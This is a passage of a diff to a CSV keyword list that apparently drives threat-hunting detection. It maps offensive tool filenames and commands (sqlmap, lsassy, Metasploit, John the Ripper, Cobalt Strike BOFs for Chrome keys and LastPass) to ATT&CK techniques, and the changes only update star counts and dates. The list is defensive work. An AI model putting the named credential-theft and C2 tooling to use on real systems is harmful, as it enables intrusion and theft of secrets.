- T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*sql_persister.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*SqlClrPayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*sqldumper.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*sqli_common_shared.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Sqli-lab*","offensive_tool_keyword","sqli-labs","SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:","T1190 - T1553","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/Audi-1/sqli-labs","1","1","N/A","N/A","10","4688","1476","2020-06-04T19:51:55Z","2012-05-19T19:41:26Z" +"*sql_persister.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*SqlClrPayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*sqldumper.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*sqli_common_shared.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Sqli-lab*","offensive_tool_keyword","sqli-labs","SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:","T1190 - T1553","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/Audi-1/sqli-labs","1","1","N/A","N/A","10","4688","1475","2020-06-04T19:51:55Z","2012-05-19T19:41:26Z" "*SQL-Injection-Auth-Bypass-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" -"*SQL-Injection-Libraries*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*SQL-Injection-Libraries*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*SQL-Injection-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*SQLiPy.py*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*SQLiScanner*","offensive_tool_keyword","SQLiScanner","Automatic SQL injection with Charles and sqlmapapi","T1190 - T1556 - T1210 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Web Attacks","https://github.com/0xbug/SQLiScanner","1","1","N/A","N/A","8","760","298","2018-05-01T09:59:47Z","2016-08-28T06:06:32Z" -"*sqlite:///ares.db*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" -"*sqlmap -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - 
TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlite:///ares.db*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*sqlmap -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*sqlmap --forms --batch -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*sqlmap.conf*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*sqlmap.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*sqlmap.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*sqlmap.conf*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmap.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmap.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*sqlmap/data/txt/wordlist.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sqlmap4burp*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" -"*sqlmapapi -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*sqlmapapi.py","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmapapi -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmapapi.py","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*sqlmapapi.py*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" -"*sqlmapproject/sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*SQLmate*","offensive_tool_keyword","SQLmate","A friend of SQLmap which will do what you always expected from SQLmap.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Web Attacks","https://github.com/s0md3v/sqlmate","1","1","N/A","N/A","4","392","119","2019-05-05T15:53:06Z","2017-10-19T19:55:58Z" +"*sqlmapproject/sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation 
tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*SQLmate*","offensive_tool_keyword","SQLmate","A friend of SQLmap which will do what you always expected from SQLmap.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Web Attacks","https://github.com/s0md3v/sqlmate","1","1","N/A","N/A","4","393","119","2019-05-05T15:53:06Z","2017-10-19T19:55:58Z" "*sqlninja*","offensive_tool_keyword","sqlninja","...a SQL Server injection & takeover tool","T1505 - T1526 - T1583 - T1588 - T1590","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://sqlninja.sourceforge.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SQLRecon.exe*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" "*SQLRecon.git*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" -"*SQLServer_Accessible_PotentialSensitiveData.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*SQLServer_DefaultLogin.txt*","offensive_tool_keyword","WinPwn","Automation for 
internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*src/cracker.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*src/genmkvpwd.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*src/john.asm*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*SQLServer_Accessible_PotentialSensitiveData.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*SQLServer_DefaultLogin.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
+"*src/cracker.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/genmkvpwd.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/john.asm*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*src/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*src/obfuscator.c*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" -"*src/Remote/chromeKey/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/Remote/lastpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/Remote/sc_config/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/Remote/sc_create/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/Remote/sc_delete/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 